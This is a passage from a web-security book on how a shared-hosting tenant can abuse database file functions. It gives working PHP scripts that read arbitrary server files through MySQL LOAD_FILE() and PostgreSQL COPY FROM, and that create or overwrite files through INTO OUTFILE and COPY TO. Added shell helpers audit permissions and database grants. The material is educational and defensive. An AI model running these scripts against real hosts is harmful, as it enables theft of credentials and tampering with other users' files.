Hosting and Databases

In addition to running scripts, hosting companies often offer their clients other services, such as access to their own database from their scripts. With a correct database configuration and a correct login-and-password authentication procedure, a user who can access his or her own database cannot access the other users' databases.

As described in the previous section, two situations are possible. First, a malicious user is one of the site owners and, therefore, has full access to his or her site. Second, an attacker has access to a site located on the same physical server as the target site.

In either case, the attacker can perform any action in the context of the site under his or her control. He or she can make database queries to read any files on the server, including files belonging to the target system. For example, in the MySQL database, the attacker can use the LOAD_FILE() function.

To achieve this, the database user in whose name the attacker establishes the database connection must have the file access privilege, and the files must be readable by all users, because it is the database server process, not the attacker's script, that opens them.

On most hosting servers, files belonging to different sites are readable by all users. This is done for two reasons. First, most systems by default create files that are readable by all users. Second, files should be readable both by their owners and by the user under which the HTTP server runs. The simplest way to meet these requirements is to allow all users to read the files.
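The following shell functions are an added example, not code from the book: they audit a hosting web root for files that any local account (including the one the database server runs under) could read, and apply the permission fix. They assume only POSIX find and chmod; the directory layout in the usage is constructed.

```shell
#!/bin/sh
# Added defender-side audit helpers (not from the book).  The section explains
# that world-readable site files are what make LOAD_FILE() and COPY ... FROM
# useful to a neighbouring tenant; these functions find and fix such files.

# world_readable DIR: print every regular file under DIR whose "other" read
# bit is set (mode -004), i.e. readable by any local account.
world_readable() {
    find "$1" -type f -perm -004 | sort
}

# group_only DIR: strip the "other" bits from files and directories under DIR
# so that only the owner and the owning group keep access.  The web server is
# then given access through the group (see the note below), not through "other".
group_only() {
    find "$1" -type f -perm -004 -exec chmod o-rwx {} +
    find "$1" -type d -perm -001 -exec chmod o-rwx {} +
}

# Usage (constructed layout):
#   root=/var/www            # hypothetical web root holding several sites
#   world_readable "$root"   # lists e.g. /var/www/site1/config.php
#   group_only "$root"       # afterwards world_readable prints nothing
```

After `group_only`, the HTTP server still needs to reach the files, which is done either by making the site's files group-owned by the web server's group (`chgrp` on the site directory) or, better, by running each site's PHP under its own account (suEXEC or a per-site php-fpm pool), so that no cross-site read is needed in the first place.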

As a result, a user with access to a database can sometimes use SQL to view the contents of files that are readable by all users. For example, he or she can use the following script to access the MySQL database and output the contents of any file.

http://localhost/7/4.php

<?php
// Example 7/4.php: read a server file through MySQL LOAD_FILE().
// Note: the mysql_* extension was removed in PHP 7; mysqli or PDO replace it.
$server = "localhost";
$user   = "root";
$pass   = "";
$db     = "book1";

echo "<html><body>
<form>
file name: <input type=text name=file><br>
<input type=submit value='output'>
</form>";

$file = isset($_GET['file']) ? $_GET['file'] : '';
if (!empty($file)) {
    mysql_connect($server, $user, $pass);
    mysql_select_db($db);
    // LOAD_FILE() opens the file with the privileges of the database server process.
    $sq = "select load_file('" . addslashes($file) . "') as f";
    $q  = mysql_query($sq);
    $s  = mysql_error();
    if (!empty($s)) {
        echo "Error: $s";
    } else {
        $r = mysql_fetch_object($q);
        // LOAD_FILE() returns NULL when the file is unreadable or the FILE privilege is missing.
        if (!$r || $r->f === null) {
            echo "empty";
        } else {
            echo "<hr>\r\n" . nl2br(htmlspecialchars($r->f)) . "\r\n<hr>";
        }
    }
}
echo "</body></html>";
?>

To use this method for obtaining the contents of files, the MySQL user who established the connection to the database server must have the FILE privilege (the file_priv access right, stored in the File_priv column of the mysql.user table).

A user of the PostgreSQL database could use the following script to read the contents of any file.

http://localhost/7/5.php

<?php
// Example 7/5.php: read a server file through PostgreSQL COPY ... FROM 'file'.
$server = "localhost";
$user   = "pgsql";
$pass   = "";
$db     = "testdb";

echo "<html><body>
<form>
file name: <input type=text name=file><br>
<input type=submit value='output'>
</form>";

$file = isset($_GET['file']) ? $_GET['file'] : '';
if (!empty($file)) {
    $c = pg_connect("host=$server port=5432 dbname=$db user=$user password=$pass");
    if (!$c) {
        echo "Error: could not connect";
        echo "</body></html>";
        exit;
    }
    // The helper table tt(v text) is assumed to exist already; empty it first.
    pg_query($c, "delete from tt");
    $s = pg_last_error($c);
    if (!empty($s)) {
        echo "Error: $s";
        echo "</body></html>";
        exit;
    }
    // COPY ... FROM a server-side file is executed by the database server process,
    // which reads the file line by line into the table.
    $sq = "copy tt(v) from '" . addslashes($file) . "'";
    $q  = pg_query($c, $sq);
    $s  = pg_last_error($c);
    if (!empty($s)) {
        echo "Error: $s";
        echo "</body></html>";
        exit;
    }
    $q = pg_query($c, "select v from tt");
    $s = pg_last_error($c);
    if (!empty($s)) {
        echo "Error: $s";
    } else {
        echo "<hr>\r\n";
        while ($r = pg_fetch_object($q)) {
            echo nl2br(htmlspecialchars($r->v)) . "<br>\r\n";
        }
        echo "\r\n<hr>";
    }
}
echo "</body></html>";
?>

This script uses PostgreSQL's COPY statement, which can move data between a table and a server-side file. If the attacker can access the PostgreSQL database with the rights of a user able to manipulate the database, he or she can use this or a similar script to obtain the contents of any text file.

In addition, if the attacker can send SQL queries, he or she can create a file (and sometimes edit an existing one) using the rights of the user who established the connection to the database. For example, an attacker who has access to the MySQL database can use the following script:

http://localhost/7/6.php

<?php
// Example 7/6.php: write a file on the server through MySQL SELECT ... INTO OUTFILE.
// Note: the mysql_* extension was removed in PHP 7; mysqli or PDO replace it.
$server = "localhost";
$user   = "root";
$pass   = "";
$db     = "book1";

echo "<html><body>
<form method=POST>
file name: <input type=text name=file><br>
<textarea name=text cols=60 rows=30></textarea><br>
<input type=submit value='write'>
</form>";

$file = isset($_POST['file']) ? $_POST['file'] : '';
$text = isset($_POST['text']) ? $_POST['text'] : '';
if (!empty($file)) {
    mysql_connect($server, $user, $pass);
    mysql_select_db($db);
    // INTO OUTFILE creates the file with the privileges of the database server
    // process.  The table test1 is assumed to exist and hold at least one row.
    $sq = "select '" . addslashes($text) . "' from test1 limit 1"
        . " into outfile '" . addslashes($file) . "'";
    $q = mysql_query($sq);
    $s = mysql_error();
    if (!empty($s)) {
        echo "Error: $s";
    } else {
        echo "<b>Done!</b>";
    }
}
echo "</body></html>";
?>

A specific feature of MySQL is that the file written by INTO OUTFILE does not need to exist beforehand; MySQL creates it. The directory to which the file is written must be writable by all users, so that the database server's account can create the file there.

A malicious user who has access to the PostgreSQL database can load and execute the following PHP script, which uses the file features of PostgreSQL (COPY ... TO) to create or overwrite any file with the rights of the PostgreSQL user.

http://localhost/7/7.php

<?php
// Example 7/7.php: write a file on the server through PostgreSQL COPY ... TO 'file'.
$server = "localhost";
$user   = "pgsql";
$pass   = "";
$db     = "testdb";

echo "<html><body>
<form method=POST>
file name: <input type=text name=file><br>
<textarea name=text cols=60 rows=30></textarea><br>
<input type=submit value='write'>
</form>";

$file = isset($_POST['file']) ? $_POST['file'] : '';
$text = isset($_POST['text']) ? $_POST['text'] : '';
if (!empty($file)) {
    $c = pg_connect("host=$server port=5432 dbname=$db user=$user password=$pass");
    if (!$c) {
        echo "Error: could not connect";
        echo "</body></html>";
        exit;
    }
    // The helper table tt(v text) is assumed to exist already; empty it first.
    pg_query($c, "delete from tt");
    $s = pg_last_error($c);
    if (!empty($s)) {
        echo "Error: $s";
        echo "</body></html>";
        exit;
    }
    // Stage the text in the table, then COPY the table out to the target file.
    $sq = "insert into tt(v) values('" . addslashes($text) . "')";
    $q  = pg_query($c, $sq);
    $s  = pg_last_error($c);
    if (!empty($s)) {
        echo "Error: $s";
        echo "</body></html>";
        exit;
    }
    // COPY ... TO a server-side file creates or overwrites it as the database server process.
    $sq = "copy tt(v) to '" . addslashes($file) . "'";
    $q  = pg_query($c, $sq);
    $s  = pg_last_error($c);
    if (!empty($s)) {
        echo "Error: $s";
    } else {
        echo "<b>Done</b>";
    }
}
echo "</body></html>";
?>

This is how a malicious user with access to a database can manipulate any files in the system using the rights granted to him or her by the database. This person can be either a malicious client of the hosting company or an attacker who used a vulnerability to gain control over a site on the hosting server.
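The scripts above work only when the database account carries a file privilege (MySQL FILE, or for PostgreSQL the superuser attribute, and from PostgreSQL 11 membership in pg_read_server_files / pg_write_server_files) and, for MySQL, when secure_file_priv does not restrict where files may be read or written. The following shell helpers are an added example, not code from the book: one flags risky grants in SHOW GRANTS output, one reports the secure_file_priv setting from a my.cnf file, and one runs the same checks against live servers. The sample grants and config in the usage are constructed; the live checks assume working mysql and psql clients.

```shell
#!/bin/sh
# Added defender-side audit helpers (not from the book).  They look for the
# two conditions the section relies on: database accounts that may read or
# write server files, and a MySQL server that does not restrict such files.

# flag_file_grants: reads SHOW GRANTS output (one GRANT statement per line)
# on stdin and prints the grants that confer file access, i.e. FILE or ALL
# PRIVILEGES on *.*.  FILE is a global privilege, so only "ON *.*" grants
# can carry it; a database-level ALL PRIVILEGES does not include it.
flag_file_grants() {
    awk 'toupper($0) ~ /ON \*\.\*/ &&
         (toupper($0) ~ /ALL PRIVILEGES/ || toupper($0) ~ /(^|[ ,])FILE([ ,]|$)/)'
}

# secure_file_priv_status FILE: reads a my.cnf-style file and reports how the
# server restricts LOAD_FILE() / INTO OUTFILE:
#   DISABLED       secure_file_priv=NULL   (no file import/export at all)
#   RESTRICTED DIR secure_file_priv=/dir   (files only inside that directory)
#   UNRESTRICTED   empty or absent         (any file the server process can reach)
secure_file_priv_status() {
    v=$(sed -n 's/^[[:space:]]*secure[-_]file[-_]priv[[:space:]]*=[[:space:]]*//p' "$1" \
        | tail -n 1 | tr -d "\"'")
    case "$v" in
        NULL|null) echo DISABLED ;;
        "")        echo UNRESTRICTED ;;
        *)         echo "RESTRICTED $v" ;;
    esac
}

# audit_live: the same checks against running servers.  Assumes mysql and
# psql clients with working credentials; the pg_*_server_files roles exist
# from PostgreSQL 11 onwards.
audit_live() {
    mysql -N -B -e "SELECT User, Host FROM mysql.user WHERE File_priv = 'Y'"
    mysql -N -B -e "SHOW VARIABLES LIKE 'secure_file_priv'"
    psql -At -c "SELECT rolname FROM pg_roles WHERE rolsuper
                 OR pg_has_role(oid, 'pg_read_server_files', 'member')
                 OR pg_has_role(oid, 'pg_write_server_files', 'member')"
}

# Usage (constructed sample; a hosting account normally needs no FILE grant):
#   printf "GRANT FILE ON *.* TO 'web2'@'localhost'\n" | flag_file_grants
#   secure_file_priv_status /etc/my.cnf    # hypothetical path
```

Hosting accounts should appear in neither list: per-site database users need privileges on their own schema only, and secure_file_priv should be NULL (or a dedicated directory) on a shared MySQL server. For PostgreSQL, tenants must not be superusers or members of the server-files roles, since COPY to or from a server path is otherwise denied.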



Hacker Web Exploitation Uncovered
ISBN: 1931769494
Year: 2005
Pages: 77
